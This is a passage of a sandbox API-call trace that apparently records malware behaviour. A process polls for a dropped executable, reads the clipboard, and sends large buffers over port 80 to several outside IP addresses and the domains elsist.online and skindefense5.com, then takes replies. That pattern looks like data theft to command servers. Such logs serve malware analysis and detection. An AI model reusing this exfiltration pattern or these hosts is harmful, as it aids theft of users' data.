(dwMilliseconds=0x1388) [0308.482] Sleep (dwMilliseconds=0x1388) [0308.484] Sleep (dwMilliseconds=0x1388) [0308.486] Sleep (dwMilliseconds=0x1388) [0308.494] Sleep (dwMilliseconds=0x1388) [0308.496] Sleep (dwMilliseconds=0x1388) [0308.498] Sleep (dwMilliseconds=0x1388) [0308.499] Sleep (dwMilliseconds=0x1388) [0308.501] Sleep (dwMilliseconds=0x1388) [0308.502] Sleep (dwMilliseconds=0x1388) [0308.504] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0308.504] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x1a68, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0308.504] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0308.504] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1d9470) returned 1 [0308.504] NtQueryInformationFile (in: FileHandle=0x1a68, IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60) returned 0x0 [0308.504] NtClose (Handle=0x1a68) returned 0x0 [0308.505] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0308.505] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0xffffffffffffffff, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0308.505] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0308.505] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1d9b70) returned 1 [0308.505] Sleep (dwMilliseconds=0x1388) [0308.507] Sleep (dwMilliseconds=0x1388) [0308.508] Sleep (dwMilliseconds=0x1388) [0308.510] Sleep (dwMilliseconds=0x1388) [0308.511] Sleep (dwMilliseconds=0x1388) [0308.513] Sleep (dwMilliseconds=0x1388) [0308.514] Sleep (dwMilliseconds=0x1388) [0308.516] Sleep (dwMilliseconds=0x1388) [0308.520] Sleep (dwMilliseconds=0x1388) [0308.525] Sleep (dwMilliseconds=0x1388) [0308.528] Sleep (dwMilliseconds=0x1388) [0308.530] Sleep (dwMilliseconds=0x1388) [0308.532] Sleep (dwMilliseconds=0x1388) [0308.533] Sleep (dwMilliseconds=0x1388) [0308.535] Sleep (dwMilliseconds=0x1388) [0308.536] Sleep (dwMilliseconds=0x1388) [0308.538] Sleep (dwMilliseconds=0x1388) [0308.540] Sleep (dwMilliseconds=0x1388) [0308.541] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0308.541] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x1a68, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0308.542] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0308.542] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1da740) returned 1 [0308.542] NtQueryInformationFile (in: FileHandle=0x1a68, IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60) returned 0x0 [0308.542] NtClose (Handle=0x1a68) returned 0x0 [0308.542] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0308.542] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0xffffffffffffffff, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0308.542] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0308.542] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1da740) returned 1 [0308.542] Sleep (dwMilliseconds=0x1388) [0308.544] OpenClipboard (hWndNewOwner=0x0) returned 1 [0308.544] GetClipboardData (uFormat=0xd) returned 0xafaa320 [0308.545] GlobalLock (hMem=0xafaa320) returned 0xafaa320 [0308.545] GlobalUnlock (hMem=0xafaa320) returned 1 [0308.545] CloseClipboard () returned 1 [0308.545] socket (af=2, type=1, protocol=6) returned 0x1a68 [0308.546] connect (s=0x1a68, name=0xb26bb10*(sa_family=2, sin_port=0x50, sin_addr="51.77.52.109"), namelen=16) returned 0 [0308.587] RtlIntegerToChar (in: Value=0xca1, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="3233") returned 0x0 [0308.587] send (s=0x1a68, buf=0x8f1cf22*, len=3651, flags=0) returned 3651 [0308.588] closesocket (s=0x1a68) returned 0 [0308.589] socket (af=2, type=1, protocol=6) returned 0x1a68 [0308.589] connect (s=0x1a68, name=0xb26bb10*(sa_family=2, sin_port=0x50, sin_addr="51.77.52.109"), namelen=16) returned 0 [0308.636] RtlIntegerToChar (in: Value=0x14d, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="333") returned 0x0 [0308.636] send (s=0x1a68, buf=0x8f1cf22*, len=750, flags=0) returned 750 [0308.638] closesocket (s=0x1a68) returned 0 [0308.639] socket (af=2, type=1, protocol=6) returned 0x1a68 [0308.639] connect (s=0x1a68, name=0xb26bb10*(sa_family=2, sin_port=0x50, sin_addr="51.77.52.109"), namelen=16) returned 0 [0308.690] RtlIntegerToChar (in: Value=0xc771, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="51057") returned 0x0 [0308.690] send (s=0x1a68, buf=0x1167b56c*, len=51476, flags=0) returned 51476 [0308.692] closesocket (s=0x1a68) returned 0 [0308.693] socket (af=2, type=1, protocol=6) returned 0x1a68 [0308.693] connect (s=0x1a68, name=0xb26bb10*(sa_family=2, sin_port=0x50, sin_addr="51.77.52.109"), namelen=16) returned 0 [0308.763] RtlIntegerToChar (in: Value=0xe3939, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="932153") returned 0x0 [0308.771] send (s=0x1a68, buf=0x1167b56c*, len=932569, flags=0) returned 932569 [0308.801] closesocket (s=0x1a68) returned 0 [0308.801] socket (af=2, type=1, protocol=6) returned 0x1a68 [0308.802] connect (s=0x1a68, name=0xb26bb10*(sa_family=2, sin_port=0x50, sin_addr="51.77.52.109"), namelen=16) returned 0 [0308.871] send (s=0x1a68, buf=0x8f3a322*, len=177, flags=0) returned 177 [0308.871] setsockopt (s=0x1a68, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0308.871] recv (in: s=0x1a68, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 926 [0308.929] closesocket (s=0x1a68) returned 0 [0308.930] Sleep (dwMilliseconds=0x1388) [0308.932] OpenClipboard (hWndNewOwner=0x0) returned 1 [0308.932] GetClipboardData (uFormat=0xd) returned 0xafaa5a0 [0308.932] GlobalLock (hMem=0xafaa5a0) returned 0xafaa5a0 [0308.932] GlobalUnlock (hMem=0xafaa5a0) returned 1 [0308.933] CloseClipboard () returned 1 [0308.933] socket (af=2, type=1, protocol=6) returned 0x1a68 [0308.933] connect (s=0x1a68, name=0xb26bdf0*(sa_family=2, sin_port=0x50, sin_addr="66.235.200.145"), namelen=16) returned 0 [0309.057] RtlIntegerToChar (in: Value=0xca1, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="3233") returned 0x0 [0309.057] send (s=0x1a68, buf=0x8f1cf22*, len=3648, flags=0) returned 3648 [0309.057] closesocket (s=0x1a68) returned 0 [0309.058] socket (af=2, type=1, protocol=6) returned 0x1a68 [0309.058] connect (s=0x1a68, name=0xb26bdf0*(sa_family=2, sin_port=0x50, sin_addr="66.235.200.145"), namelen=16) returned 0 [0309.094] RtlIntegerToChar (in: Value=0x14d, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="333") returned 0x0 [0309.094] send (s=0x1a68, buf=0x8f1cf22*, len=747, flags=0) returned 747 [0309.095] closesocket (s=0x1a68) returned 0 [0309.095] socket (af=2, type=1, protocol=6) returned 0x1a68 [0309.095] connect (s=0x1a68, name=0xb26bdf0*(sa_family=2, sin_port=0x50, sin_addr="66.235.200.145"), namelen=16) returned 0 [0309.156] RtlIntegerToChar (in: Value=0xc771, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="51057") returned 0x0 [0309.157] send (s=0x1a68, buf=0x1167b56c*, len=51473, flags=0) returned 51473 [0309.158] closesocket (s=0x1a68) returned 0 [0309.159] socket (af=2, type=1, protocol=6) returned 0x1a68 [0309.160] connect (s=0x1a68, name=0xb26bdf0*(sa_family=2, sin_port=0x50, sin_addr="66.235.200.145"), namelen=16) returned 0 [0309.254] RtlIntegerToChar (in: Value=0xe3939, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="932153") returned 0x0 [0309.273] send (s=0x1a68, buf=0x1167b56c*, len=932566, flags=0) returned 932566 [0309.341] closesocket (s=0x1a68) returned 0 [0309.342] socket (af=2, type=1, protocol=6) returned 0x1a68 [0309.342] connect (s=0x1a68, name=0xb26bdf0*(sa_family=2, sin_port=0x50, sin_addr="66.235.200.145"), namelen=16) returned 0 [0309.679] send (s=0x1a68, buf=0x8f3a322*, len=176, flags=0) returned 176 [0309.680] setsockopt (s=0x1a68, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0309.680] recv (in: s=0x1a68, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c) returned -1 [0310.187] closesocket (s=0x1a68) returned 0 [0310.187] Sleep (dwMilliseconds=0x1388) [0310.189] Sleep (dwMilliseconds=0x1388) [0310.190] Sleep (dwMilliseconds=0x1388) [0310.195] Sleep (dwMilliseconds=0x1388) [0310.199] Sleep (dwMilliseconds=0x1388) [0310.200] Sleep (dwMilliseconds=0x1388) [0310.202] Sleep (dwMilliseconds=0x1388) [0310.203] Sleep (dwMilliseconds=0x1388) [0310.205] Sleep (dwMilliseconds=0x1388) [0310.207] Sleep (dwMilliseconds=0x1388) [0310.208] Sleep (dwMilliseconds=0x1388) [0310.211] Sleep (dwMilliseconds=0x1388) [0310.218] Sleep (dwMilliseconds=0x1388) [0310.220] Sleep (dwMilliseconds=0x1388) [0310.224] Sleep (dwMilliseconds=0x1388) [0310.227] Sleep (dwMilliseconds=0x1388) [0310.237] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0310.237] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x1fc0, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0310.237] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0310.237] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1d9470) returned 1 [0310.237] NtQueryInformationFile (in: FileHandle=0x1fc0, IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60) returned 0x0 [0310.237] NtClose (Handle=0x1fc0) returned 0x0 [0310.237] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0310.237] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0xffffffffffffffff, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0310.238] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0310.238] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1daac0) returned 1 [0310.238] Sleep (dwMilliseconds=0x1388) [0310.240] Sleep (dwMilliseconds=0x1388) [0310.243] Sleep (dwMilliseconds=0x1388) [0310.247] Sleep (dwMilliseconds=0x1388) [0310.249] Sleep (dwMilliseconds=0x1388) [0310.250] Sleep (dwMilliseconds=0x1388) [0310.252] Sleep (dwMilliseconds=0x1388) [0310.256] Sleep (dwMilliseconds=0x1388) [0310.258] Sleep (dwMilliseconds=0x1388) [0310.259] Sleep (dwMilliseconds=0x1388) [0310.341] Sleep (dwMilliseconds=0x1388) [0310.451] Sleep (dwMilliseconds=0x1388) [0310.453] Sleep (dwMilliseconds=0x1388) [0310.454] Sleep (dwMilliseconds=0x1388) [0310.459] Sleep (dwMilliseconds=0x1388) [0310.460] Sleep (dwMilliseconds=0x1388) [0310.462] Sleep (dwMilliseconds=0x1388) [0310.463] Sleep (dwMilliseconds=0x1388) [0310.466] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0310.466] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x978, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0310.466] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0310.466] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1da270) returned 1 [0310.466] NtQueryInformationFile (in: FileHandle=0x978, IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60) returned 0x0 [0310.466] NtClose (Handle=0x978) returned 0x0 [0310.466] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0310.466] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0xffffffffffffffff, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0310.467] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0310.467] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1da740) returned 1 [0310.467] Sleep (dwMilliseconds=0x1388) [0310.468] Sleep (dwMilliseconds=0x1388) [0310.470] Sleep (dwMilliseconds=0x1388) [0310.481] Sleep (dwMilliseconds=0x1388) [0310.482] Sleep (dwMilliseconds=0x1388) [0310.484] OpenClipboard (hWndNewOwner=0x0) returned 1 [0310.484] GetClipboardData (uFormat=0xd) returned 0xafaa5a0 [0310.484] GlobalLock (hMem=0xafaa5a0) returned 0xafaa5a0 [0310.484] GlobalUnlock (hMem=0xafaa5a0) returned 1 [0310.484] CloseClipboard () returned 1 [0310.484] socket (af=2, type=1, protocol=6) returned 0x978 [0310.484] connect (s=0x978, name=0xb26b8d0*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.216"), namelen=16) returned 0 [0310.698] RtlIntegerToChar (in: Value=0xca1, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="3233") returned 0x0 [0310.698] send (s=0x978, buf=0x8f1cf22*, len=3651, flags=0) returned 3651 [0310.700] closesocket (s=0x978) returned 0 [0310.701] socket (af=2, type=1, protocol=6) returned 0x978 [0310.701] connect (s=0x978, name=0xb26b8d0*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.216"), namelen=16) returned 0 [0311.194] RtlIntegerToChar (in: Value=0x14d, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="333") returned 0x0 [0311.194] send (s=0x978, buf=0x8f1cf22*, len=750, flags=0) returned 750 [0311.194] closesocket (s=0x978) returned 0 [0311.195] socket (af=2, type=1, protocol=6) returned 0x978 [0311.195] connect (s=0x978, name=0xb26b8d0*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.216"), namelen=16) returned 0 [0311.380] RtlIntegerToChar (in: Value=0xc771, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="51057") returned 0x0 [0311.381] send (s=0x978, buf=0x1167b56c*, len=51476, flags=0) returned 51476 [0311.382] closesocket (s=0x978) returned 0 [0311.383] socket (af=2, type=1, protocol=6) returned 0x978 [0311.383] connect (s=0x978, name=0xb26b8d0*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.216"), namelen=16) returned 0 [0311.582] RtlIntegerToChar (in: Value=0xe3939, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="932153") returned 0x0 [0311.591] send (s=0x978, buf=0x1167b56c*, len=932569, flags=0) returned 932569 [0311.603] closesocket (s=0x978) returned 0 [0311.605] socket (af=2, type=1, protocol=6) returned 0x978 [0311.605] connect (s=0x978, name=0xb26b8d0*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.216"), namelen=16) returned 0 [0311.949] send (s=0x978, buf=0x8f3a322*, len=177, flags=0) returned 177 [0311.950] setsockopt (s=0x978, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0311.950] recv (in: s=0x978, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c) returned -1 [0312.230] closesocket (s=0x978) returned 0 [0312.231] Sleep (dwMilliseconds=0x1388) [0312.236] OpenClipboard (hWndNewOwner=0x0) returned 1 [0312.236] GetClipboardData (uFormat=0xd) returned 0xafaa320 [0312.236] GlobalLock (hMem=0xafaa320) returned 0xafaa320 [0312.236] GlobalUnlock (hMem=0xafaa320) returned 1 [0312.236] CloseClipboard () returned 1 [0312.236] getaddrinfo (in: pNodeName="www.elsist.online", pServiceName="80", pHints=0xb2968f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb296928 | out: ppResult=0xb296928*=0x0) returned 11001 [0312.239] getaddrinfo (in: pNodeName="www.elsist.online", pServiceName="80", pHints=0xb2968f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb296928 | out: ppResult=0xb296928*=0x0) returned 11001 [0312.239] getaddrinfo (in: pNodeName="www.elsist.online", pServiceName="80", pHints=0xb2968f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb296928 | out: ppResult=0xb296928*=0x0) returned 11001 [0312.242] getaddrinfo (in: pNodeName="www.elsist.online", pServiceName="80", pHints=0xb2968f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb296928 | out: ppResult=0xb296928*=0x0) returned 11001 [0312.243] getaddrinfo (in: pNodeName="www.elsist.online", pServiceName="80", pHints=0xb2968f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb296928 | out: ppResult=0xb296928*=0x0) returned 11001 [0312.350] Sleep (dwMilliseconds=0x1388) [0312.351] Sleep (dwMilliseconds=0x1388) [0312.353] Sleep (dwMilliseconds=0x1388) [0312.355] Sleep (dwMilliseconds=0x1388) [0312.357] OpenClipboard (hWndNewOwner=0x0) returned 1 [0312.357] GetClipboardData (uFormat=0xd) returned 0xafaa320 [0312.357] GlobalLock (hMem=0xafaa320) returned 0xafaa320 [0312.357] GlobalUnlock (hMem=0xafaa320) returned 1 [0312.357] CloseClipboard () returned 1 [0312.358] socket (af=2, type=1, protocol=6) returned 0x978 [0312.358] connect (s=0x978, name=0xb26b690*(sa_family=2, sin_port=0x50, sin_addr="121.254.178.252"), namelen=16) returned 0 [0313.085] RtlIntegerToChar (in: Value=0xca1, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="3233") returned 0x0 [0313.085] send (s=0x978, buf=0x8f1cf22*, len=3663, flags=0) returned 3663 [0313.085] closesocket (s=0x978) returned 0 [0313.086] socket (af=2, type=1, protocol=6) returned 0x978 [0313.086] connect (s=0x978, name=0xb26b690*(sa_family=2, sin_port=0x50, sin_addr="121.254.178.252"), namelen=16) returned 0 [0313.363] RtlIntegerToChar (in: Value=0x14d, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="333") returned 0x0 [0313.363] send (s=0x978, buf=0x8f1cf22*, len=762, flags=0) returned 762 [0313.363] closesocket (s=0x978) returned 0 [0313.364] socket (af=2, type=1, protocol=6) returned 0x978 [0313.364] connect (s=0x978, name=0xb26b690*(sa_family=2, sin_port=0x50, sin_addr="121.254.178.252"), namelen=16) returned 0 [0315.112] RtlIntegerToChar (in: Value=0xc771, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="51057") returned 0x0 [0315.236] send (s=0x978, buf=0x1167b56c*, len=51488, flags=0) returned 51488 [0315.237] closesocket (s=0x978) returned 0 [0315.241] socket (af=2, type=1, protocol=6) returned 0x978 [0315.241] connect (s=0x978, name=0xb26b690*(sa_family=2, sin_port=0x50, sin_addr="121.254.178.252"), namelen=16) returned 0 [0316.370] RtlIntegerToChar (in: Value=0xe3939, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="932153") returned 0x0 [0316.387] send (s=0x978, buf=0x1167b56c*, len=932581, flags=0) returned 932581 [0316.400] closesocket (s=0x978) returned 0 [0316.401] socket (af=2, type=1, protocol=6) returned 0x978 [0316.401] connect (s=0x978, name=0xb26b690*(sa_family=2, sin_port=0x50, sin_addr="121.254.178.252"), namelen=16) returned 0 [0316.675] send (s=0x978, buf=0x8f3a322*, len=181, flags=0) returned 181 [0316.676] setsockopt (s=0x978, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0316.676] recv (in: s=0x978, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 367 [0316.976] closesocket (s=0x978) returned 0 [0316.977] Sleep (dwMilliseconds=0x1388) [0316.979] OpenClipboard (hWndNewOwner=0x0) returned 1 [0316.979] GetClipboardData (uFormat=0xd) returned 0xafaa320 [0316.980] GlobalLock (hMem=0xafaa320) returned 0xafaa320 [0316.980] GetForegroundWindow () returned 0x0 [0316.980] GetWindowTextW (in: hWnd=0x0, lpString=0x8f142a2, nMaxCount=260 | out: lpString="") returned 0 [0316.980] GlobalUnlock (hMem=0xafaa320) returned 1 [0316.980] CloseClipboard () returned 1 [0317.125] socket (af=2, type=1, protocol=6) returned 0x978 [0317.126] getaddrinfo (in: pNodeName="www.skindefense5.com", pServiceName="80", pHints=0xb293638*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb293668 | out: ppResult=0xb293668*=0x864cd30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb267830*(sa_family=2, sin_port=0x50, sin_addr="64.190.62.111"), ai_next=0x0)) returned 0 [0317.135] connect (s=0x978, name=0xb267830*(sa_family=2, sin_port=0x50, sin_addr="64.190.62.111"), namelen=16) returned 0 [0317.161] send (s=0x978, buf=0x8f3a322*, len=181, flags=0) returned 181 [0317.164] setsockopt (s=0x978, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0317.164] recv (in: s=0x978, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 774 [0317.444] closesocket (s=0x978) returned 0 [0317.445] Sleep (dwMilliseconds=0x1388) [0317.447] Sleep (dwMilliseconds=0x1388) [0317.451] Sleep (dwMilliseconds=0x1388) [0317.453] Sleep (dwMilliseconds=0x1388) [0317.454] Sleep (dwMilliseconds=0x1388) [0317.456] Sleep (dwMilliseconds=0x1388) [0317.457] Sleep (dwMilliseconds=0x1388) [0317.459] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files 